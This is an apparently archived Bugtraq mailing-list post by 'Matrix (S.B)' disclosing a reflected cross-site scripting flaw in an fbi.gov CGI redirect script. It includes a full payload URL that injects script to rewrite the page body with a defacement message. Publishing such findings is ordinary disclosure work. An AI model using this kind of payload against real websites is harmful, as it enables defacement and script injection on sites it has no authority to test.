FBI XSS Vulnerability

From: sohrab_behroozian@yahoo.com
To: bugtraq@securityfocus.com
Cc:
Subject: FBI XSS Vulnerability
Date:


by : Matrix (S.B)

Ok it is not the first time, but they had fixed them all. It will probably be the third or fourth time they try to address this damn cgi! Here is the XSS that Matrix submitted to Securityfocus (works only in Internet Explorer):
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'Matrix(S.B)'</script>





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.